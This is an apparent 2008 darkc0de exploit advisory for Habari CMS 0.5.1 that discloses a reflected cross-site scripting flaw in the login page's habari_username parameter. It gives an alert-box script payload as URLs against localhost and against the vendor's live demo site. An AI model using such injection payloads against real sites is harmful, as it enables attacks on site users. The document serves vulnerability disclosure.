Home / exploits habaricms-xss.txt
Posted on 17 October 2008
################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ _ __| _/____ # # / __ |\__ \_ __ |/ // ___/ /_ / __ |/ __ # # / /_/ | / __ | | / < \___ \_/ / /_/ ___/ # # \____ |(______/__| |__|_ \_____>\_____ /\_____|\____ # # / / / # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ / / / # # \___| | / ___/ / # # \___ >__| \___ >/\_/ # # est.2007 / / forum.darkc0de.com # ################################################################ ################################################################ # Greetings to --d3hydr8 -r45c4l -baltazar -sinner_01 # # -C1c4Tr1Z -Gabitzu and all darkc0de members # ;############################################################### # # Author: swappie [aka] faithlove # # Home : www.darkc0de.com # # Email : swappieakafaithlove@gmail.com # # Do researching and share! # ;############################################################### # # Title: Habari CMS 0.5.1 # # CMS Link: http://habariproject.org/dist/habari_head.zip # # Vendor: http://habariproject.org/ # ;############################################################### # # Dork: I'm sure you can figure that by yourself, right? # ################################################################ XSS Exploit; ------------ http://localhost/user/login/?habari_username=>"><script>alert("XSS Vuln")</script> Live Demo; ---------- http://demo.habariproject.org/user/login/?habari_username=>"><script>alert("XSS Vuln")</script> ################################################################# # # Bug Discovered on: 16 October 2008 # #################################################################
